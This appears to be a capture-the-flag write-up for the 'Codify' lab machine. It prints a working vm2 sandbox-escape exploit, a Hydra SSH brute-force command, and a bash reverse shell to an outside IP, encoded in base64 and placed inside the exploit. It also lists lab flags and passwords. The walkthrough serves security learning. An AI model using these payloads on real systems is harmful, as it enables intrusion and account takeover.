Codify
Initial Scan
sudo nmap -T4 -v 10.129.82.199
sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify



HTTP
Had to edit the host file to get the Webpage

Checking out their About Us page

Looking around for VM2 CVE's, found this article on snyk about RCE with VM2 after seeing a couple others. Testing the other PoC's I didn't get anywhere until I found this one. We can run commands on the host bypassing the VM.
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("ls -al").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked

whoami shows us the svc
user. Also looking at /etc/passwd
we see an additional user, joshua

BruteForce
Trying to run Hydra against the user joshua for a password
hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199


joshua:spongebob1
Obtaining shell
Working to get a shall as svc. Looking around for reverse shell, I found PayloadAllTheThings.
bash -i >& /dev/tcp/10.10.14.53/1234 0>&1
Running it normally didn't work so I encoded it
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash"
Full command
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
toString: new Proxy(() => "", {
apply(target, thiz, args) {
const process = args.constructor.constructor("return process")();
throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString();
},
}),
};
try {
err.stack;
} catch (stdout) {
stdout;
}
`;
console.log(vm.run(code)); // -> hacked
Foothold
We have shell as svc

Seeing what permissions we have

User Flag
After getting into shell from the SVC user, I got Joshuas password with hydra.


User flag: c53cdd4688463871ba3f4020ab6f3ccb
Priv Esc

We have run the note of "User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh" So looking at the shell file

Running that as root as get

Get PSPY Initiate another SSH session. Get pspy64 onto the target machine, run it, then run the /opt/scripts/mysql-backup.sh
script





Root pass: kljh12k3jhaskjh12kjh3

Root flag: 4e43f866588b3b3433196af3cef8b768
Last updated